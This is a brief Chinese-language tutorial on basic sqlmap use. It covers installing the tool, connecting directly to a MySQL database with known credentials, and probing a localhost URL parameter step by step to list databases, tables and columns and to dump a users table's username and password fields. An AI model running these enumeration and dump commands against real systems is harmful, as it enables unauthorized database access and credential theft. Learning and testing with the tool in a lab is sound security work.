sqlmap的简单使用

安装

安装python环境
将sqlmap文件夹放入python文件夹下
命令行进入sqlmap文件夹,运行python sqlmap.py

---

直连数据库

1. 服务型数据库（前提是知道数据库用户名和密码）
   例如：sqlmap -d “mysql://root:root@192.168.3.3:3306/joke” -f --banner --users
   其中，两个root分别为账号密码，joke为数据库名称
   -f fingerprint指纹
   
2. 文件型数据库（前提知道数据库绝对路径）
   DBMS://DATABASE_FILEPATH(SQLite,Mocrosoft Access,Firebird,etc)

---

URL探测

Sqlmap直接对单一URL探测，参数使用-u或–url
例如：sqlmap.py -u http://localhost/727/?id=1

1. 获取数据库名字
   sqlmap.py -u http://localhost/727/?id=1 --current-db

2. 获取表名
   sqlmap.py -u http://localhost/727/?id=1 -D joke --table

3. 获取到字段名
   sqlmap.py -u http://localhost/727/?id=1 -D joke -T users --columns

4. 获取字段值
   sqlmap.py -u http://localhost/727/?id=1 -D joke -T users -C user,pass --dump

注：之前跑过的记录会存在output文件夹中,若不删除记录,再次使用时会展示上次的记录